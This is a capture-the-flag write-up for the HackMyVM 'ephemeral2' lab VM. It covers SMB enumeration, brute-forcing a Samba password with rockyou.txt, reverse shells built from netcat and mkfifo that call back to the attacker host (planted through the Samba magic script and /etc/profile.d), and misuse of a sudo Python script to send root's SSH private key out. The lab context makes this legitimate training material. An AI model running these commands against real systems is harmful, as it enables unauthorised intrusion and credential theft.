The free CTF Challenge web site “hackmyvm.eu” have an other medium level vm called ‘ephemeral2‘ for us to download, enumerate and get some flags. In this write-up will try to describe my method and thought process on how I completed this hackmyvm ephemeral2 CTF challenge.
Table of Contents
Setup for hackmyvm ephemeral2
The vm can be downloaded from hackmyvm.eu as an OVA file and imported into Oracle VirtualBox.
My Network,
- 192.168.186.150 – This is my BlackArch enumeration system.
- 192.168.186.10 – This is the ephemeral2 vm.
For enumeration of the hackmyvm ephemeral2 Challenge I will be using my BackArch system build that I created in a previous blog post. You can use any Kali, BlackArch, Parrot or just standard Linux to proceed.
Enumeration
nmap
The first command to run is nmap for network services enumeration.
There are only 4 ports open,
- 80, http,
- 22, ssh,
- 139 and 445, smb,
Using a web fuzzer with the website and I found nothing of interest. So lets dig deeper into the samba part. And use the below command to see if we can get any user information.
Samba
enum4linux -U 192.168.186.10
After a minute of it running we get a username,
Account: randy Name: randy Now to get the share list
enum4linux -S 192.168.186.10
This results in a list of the directories shared by samba. There is only one of interest and its below.
Sharename Type Comment
--------- ---- ----
SYSADMIN Disk
But this name and share is not enough to mount a remote file system (SYSADMIN). So I have to use smbrute to try and get the password. I used the rockyou.txt password and it took a long time, be prepared to wait. Also make sure you have smbclient installed before you run the smbrute script.
The script smbrute.py needs three things to run. A file with the usernames, a file with the passwords and a target. So use a file with one user name “randy” and the rockyou.txt password list on github. If rockyou.txt is too big you will have to break it up. Hint: The password is in the top 2000 of this file.
python3 ./smbrute.py -t 192.168.186.10 -u /tmp/users -p /opt/rockyou.txt
SMB Mount
Eventually you will get the password. Just wait. And once you have the password you can mount up the share.
sudo mount -t cifs -o username=randy //192.168.186.10/SYSADMIN /mnt
Some interesting files, take a look at them. The one I am most interested is in the smb.conf file. And “randys” share configuration.
Reverse Shell
Look up what magic script does. It’s really interesting. So after you look that up take a look at creating a reverse shell script,
vim /tmp/rev.shPut in the below contents.
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.186.150 4444 >/tmp/fNow in another window run on the enumeration system, open a netcat to capture the shell.
nc -vlnp 4444And copy your reverse shell script into the mount. If you are not root be sure to use sudo.
sudo cp /tmp/rev.sh /mnt/smbscript.elf
And you should get a shell on the netcat Terminal window.
More Enumeration
After some poking around you can find two things.
- /etc/profile.d is writable
- There is a job that runs ssh for the user ralph, in cron, every minute (see /etc/crontab).
Another Reverse Shell
So all scripts in /etc/profile.d are run when someone logs in. Therefore when the ssh script runs for the user “ralph” it can be used to spawn another reverse shell. So modify the reverse shell script we created earlier to look like the below.
#!/bin/bash
rm /tmp/k;mkfifo /tmp/k;cat /tmp/k|sh -i 2>&1|nc 192.168.186.150 4445 >/tmp/kAnd put it into “/etc/profile.d/shell.sh” on the host. Then in another window or the enumeration host, run another netcat.
nc -vlnp 4445and wait…..
Now we have another shell, this time as the user “ralph”.
Stabilize the shell.
Sudo
Take a look at sudo -l
This script does something interesting to the files input into it. Try to figure it out.
Netcat One More time
On yet another terminal on your enumeration host, run netcat again.
nc -vlnp 4446Now run the sudo command
sudo /usr/bin/python3 /home/ralph/getfile.pyWhen “File Path” pops up, put in
File path: /root/.ssh/id_rsaWhen IP comes up, put in the ip of your enumeration host and the port you ran netcat on.
IP address: 192.168.186.150:4446And all going well, the root ssh private key will pop up on the netcat window.
Root Shell
Save it on the ephemeral system somewhere (I used /tmp/key.pem). Set the permissions to 600 and use the below to get onto the system as root.
vi /tmp/key.pem
chmod 600 /tmp/key.pem
ssh -i /tmp/key.pem root@localhost
Wrap-Up
I found this room challenging and engaging. Thanks to rpj7 for pointing out that running the same command more than once can yield different results.
Be First to Comment